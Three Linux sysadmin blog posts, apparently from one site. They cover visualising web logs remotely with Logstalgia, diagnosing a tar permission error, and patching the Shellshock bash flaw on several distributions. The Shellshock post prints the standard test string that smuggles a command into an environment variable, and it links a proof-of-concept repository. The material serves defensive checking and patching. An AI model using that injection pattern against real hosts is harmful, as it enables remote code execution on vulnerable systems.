To make Logstalgia visualize log output you will need access to the server's physical console screen. As physical access is not possible on most dedicated servers already colocated in some datacenter, you can also use a local Linux PC / notebook with Logstalgia installed to process webserver access logs remotely like so:

logstalgia-visualize-your-apache-nginx-lighttpd-logs-graphically-in-x-and-console-locally-and-remotely

ssh hipo@pc-freak.net tail -f /var/log/apache2/access.log | logstalgia --sync

Note! If you get empty output from Logstalgia, this is because of permission issues; in this example my user hipo is added to the www-data Apache group. If you want to give your user access like mine, issue on the remote ssh server:
 

addgroup hipo www-data


Alternatively you can log in with ssh as root, e.g. ssh root@pc-freak.net

If you have a GNOME / KDE X environment on the Linux machine from which you're ssh-ing, Logstalgia will visualize webserver access.log requests inside a new X window; otherwise, if you're on a Linux console with no X server graphics, it will visualize the web log statistics graphically using console svgalib.

 

If you're planning to save the output from the Logstalgia visualization screen for later use, let's say you have to present to your CEO statistics about all your servers' webserver logs, you can save the Logstalgia-produced video in .ppm (netpbm) format.

If you have physical console access to the server:

logstalgia -1280x720 --output-ppm-stream output.ppm /var/log/httpd/access.log

Or if you just have a PC with Linux and you want to save the visualized content of access.log remotely:

ssh hipo@pc-freak.net tail -f /var/log/nginx/pc-freak-access.log | logstalgia -1280x720 --output-ppm-stream --sync output.ppm

 


To make the produced .ppm usable later, you can use ffmpeg to convert it to .mp4:

ffmpeg -y -r 60 -f image2pipe -vcodec ppm -i output.ppm -vcodec libx264 -preset ultrafast -pix_fmt yuv420p -crf 1 -threads 0 -bf 0 nginx.server.log.mp4

Then to play the videos use any video player, I usually use vlc and mplayer.

For complete info on Logstalgia, the website access log visualizer, check its home page on Google Code.

If you're too lazy to install Logstalgia, here is a YouTube video made from its output:

Enjoy 🙂

Fix “tar: Error exit delayed from previous errors” – its cause and solution

Monday, August 18th, 2014

Reading Time: 2 minutes

fix-solve-tar-error-delayed-exit-from-previous-errors-tarball-error

tar: Error exit delayed from previous errors

This is a very common error encountered when creating archives (or when backing up server configurations / websites / SQL binary data). The error is quite unexplanatory, and even when creating the archive verbosely in order to see the files added to it in "real time" with, let's say:

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql


it is pretty hard to track exactly on which file the backup produces the Error exit delayed from previous errors; this is especially the case when adding to the archive directories containing millions of tiny, few-kilobyte-sized files. Many novice or incautious Linux admins might simply ignore the warning if they're in a hurry or have excessive work to be done, as a .tar.gz backup will still be produced and, when uncompressed, most of the files are there, so the backup error would seem not a big issue.

However, as backing up files is vital stuff, especially when moving the files off a server to be decommissioned, you have to be extra careful and make the backup properly, i.e. figure out the cause of the error. To do so, log the full output of the tar operation with the tee command, like so:

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites/ /home/sql 2>&1 | tee /tmp/backup_tar_full_output.log
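Once the run completes, a quick grep over the tee-d log usually pinpoints the offending files right away (a minimal sketch using the log path from above):

grep -iE "error|permission denied" /tmp/backup_tar_full_output.log | tail -20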

Alternatively, you can review the whole file and look for errors with the less search (the / (slash) key), looking for the "error" and "permission den" keywords; this should point you to what is causing the error. In cases when millions of files are to be archived the log might grow really big and become hard to process, therefore a much quicker way to understand what is happening is to log only the file list and leave the errors printed on the shell, with > (shell redirect):
 

tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql > /tmp/backup_failure-cause.log

 

tar: www.ur-website.com-http/2.0.63/conf/tnsnames.ora.20080918: Cannot open: Permission denied
tar: Removing leading `/' from member names

The error clearly indicates that the cause is a lack of permissions to read the file tnsnames.ora.20080918, so the solution is either to grant permissions to the non-root user with the chmod / chown commands (in my case, grant perms to the user hipo which tar runs as), or to run the website backup again as the superuser. I usually just run it as root to prevent tampering with the original permissions, e.g. to solve the error, either:

$ su root
# tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql

Or even better, if sudo is installed and the user is added to the /etc/sudoers file:

$ sudo tar -czvf /tmp/filename_backup_date-of-backup.tar.gz /home/websites /home/sql


Though permission errors are the most frequent reason for

tar: Error exit delayed from previous errors, you should keep in mind that in some cases the error might be caused by a failing RAID member disk drive, or a single HDD failure on systems that are not in a RAID array.

 

Fixing Shellshock new critical remote bash shell exploitable vulnerability on Debian / Ubuntu / CentOS / RHEL / Fedora / OpenSuSE and Slackware

Friday, October 10th, 2014

Reading Time: 2 minutes

Bash-ShellShock-remote-exploitable-Vulnerability-affecting-Linux-Mac-OSX-and-BSD-fixing-shellshock-bash-vulnerability-debian-redhat-fedora-centos-ubuntu-slackware-and-opensuse
If you still haven't heard about the ShellShock Bash (Bourne Again shell) remote exploit vulnerability and you admin some Linux server, you will definitely have to read seriously about it. The ShellShock Bash vulnerability became public on Sept 24 and is described in detail here.

The vulnerability allows a remote malicious attacker to execute arbitrary code under certain conditions, by passing strings of code following environment variable assignments. Affected are most bash versions, from bash 1.14 up to bash 4.3.
Even if you have patched, there are reports of other bash flaws in the way bash handles shell variables, so probably in the coming months there will be even more patches to follow.

OSes affected by the bash flaw are Linux, Mac OS and the BSDs; common attack vectors are:

• Some DHCP clients

• OpenSSH servers that use the ForceCommand capability (in the sshd config)

• Apache webservers that use CGI scripts through mod_cgi and mod_cgid, as well as CGIs written in bash or launching bash subshells

• Network exposed services that use bash somehow

Even though there is a patch, there are further reports from both Google developers and RedHat devs claiming the patch is ineffective; they say there are other flaws in how bash handles variables which lead to the same remote code execution.

There are already a couple of online testing tools to check whether your website, or a certain script on a website, is vulnerable to the bash remote code execution; one of the few online remote bash vulnerability scanners is here and here. Also, a good usable resource to test whether your webserver is vulnerable to the ShellShock remote attack is found on ShellShocker.Net.
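To quickly check a local shell (both before and after patching), the widely circulated test for the original CVE-2014-6271 flaw can be run directly on the host; if the word vulnerable gets printed, the installed bash is affected:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"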

As there are probably plenty of non-standard custom written scripts online, there is not too much publicity about the problem, and most admins are lazy, the vulnerability will stay unpatched for a really long time, and we're about to see more and more exploit tools circulating in the script kiddies' IRC botnets.

Fixing the bash ShellShock remote vulnerability on Debian 5.0 Lenny.

Follow the article suggesting how to fix the remotely exploitable bash in a few steps on older unsupported Debian 4.0 / 3.0 (Potato) etc. – here.

Fixing the bash ShellShock vulnerability on Debian 6.0 Squeeze: for those who never heard, since April 2014 there is a Debian LTS (Long Term Support) repository. To fix it on Debian 6.0 use the LTS package repository, as described in the following article.

If you have issues patching bash on your Debian Squeeze 6.0 Linux, it might be because you already have a newer version of bash installed and apt-get refuses to overwrite it with an older version provided by the Debian LTS repos. The quickest and surest way to fix it is literally the following:


vim /etc/apt/sources.list

Paste inside to use the following LTS repositories:

deb http://http.debian.net/debian/ squeeze main contrib non-free
deb-src http://http.debian.net/debian/ squeeze main contrib non-free
deb http://security.debian.org/ squeeze/updates main contrib non-free
deb-src http://security.debian.org/ squeeze/updates main contrib non-free
deb http://http.debian.net/debian squeeze-lts main contrib non-free
deb-src http://http.debian.net/debian squeeze-lts main contrib non-free

Further on to check the available installable deb package versions with apt-get, issue:



apt-cache showpkg bash
...
...
Provides:
4.1-3+deb6u2 -
4.1-3 -
Reverse Provides:

As you see, there are two installable versions of bash: one from the default Debian 6.0 repos, 4.1-3, and a second one, 4.1-3+deb6u2. Another way to check the possible alternative installable versions, when more than one version of a package is available, is with:



apt-cache policy bash
...
*** 4.1-3+deb6u2 0
500 http://http.debian.net/debian/ squeeze-lts/main amd64 Packages
100 /var/lib/dpkg/status
4.1-3 0
500 http://http.debian.net/debian/ squeeze/main amd64 Packages

Then to install the LTS bash version on Debian 6.0 run:



apt-get install bash=4.1-3+deb6u2

Patching supported Ubuntu Linux versions against the ShellShock bash vulnerability:
A security notice addressing the Bash vulnerability in Ubuntu is in the Ubuntu Security Notice (USN) here.
USNs are the way Ubuntu discloses packages affected by security issues, thus Ubuntu users should keep a frequent eye on the Ubuntu Security Notices.

apt-get update
apt-get install bash

Patching the Bash ShellShock vulnerability on EOL (End of Life) versions of Ubuntu:

mkdir -p /usr/local/src/dist && cd /usr/local/src/dist
wget http://ftpmirror.gnu.org/bash/bash-4.3.tar.gz.sig
wget http://ftpmirror.gnu.org/bash/bash-4.3.tar.gz
wget http://tiswww.case.edu/php/chet/gpgkey.asc
gpg --import gpgkey.asc
gpg --verify bash-4.3.tar.gz.sig
cd ..
tar xzvf dist/bash-4.3.tar.gz
cd bash-4.3
mkdir patches && cd patches
wget -r --no-parent --accept "bash43-*" -nH -nd ftp.heanet.ie/mirrors/gnu/bash/bash-4.3-patches/ # Use a local mirror
echo *sig | xargs -n 1 gpg --verify --quiet

cd ..
echo patches/bash43-0?? | xargs -n 1 patch -p0 -i

./configure --prefix=/usr --bindir=/bin \
--docdir=/usr/share/doc/bash-4.3 \
--without-bash-malloc \
--with-installed-readline

make
make test && make install

To solve the bash vulnerability in recent Slackware Linux:

slackpkg update
slackpkg upgrade bash

For old Slackware versions, either download a patched version of bash, or download the source for the currently installed package and apply the respective patch for the ShellShock vulnerability.
There is also a GitHub project with "ShellShock" Proof of Concept code demonstrations – https://github.com/mubix/shellshocker-pocs
There are also unconfirmed speculations that the bash vulnerability bug may also impact:

Speculations (unconfirmed, possibly vulnerable common server services):

• XMPP(ejabberd)

• Mailman

• MySQL

• NFS

• Bind9

• Procmail

• Exim

• Juniper Google Search

• Cisco Gear

• CUPS

• Postfix

• Qmail

Fixing ShellShock bash vulnerability on supported versions of CentOS, Redhat, Fedora

In supported versions of CentOS which have not reached EOL:

yum -y install bash

In recent RedHat and Fedora releases, to patch:

yum update bash

To patch the bash vulnerability in OpenSUSE:

zypper patch --cve=CVE-2014-7187

Shellcode is worser vulnerability than recent SSL severe vulnerability Hearbleed. According to Redhat and other sources this new bash vulnerability is already actively exploited in the wild and probably even worms are crawling the net stealing passwords, data and building IRC botnets for remote control and UDP flooding.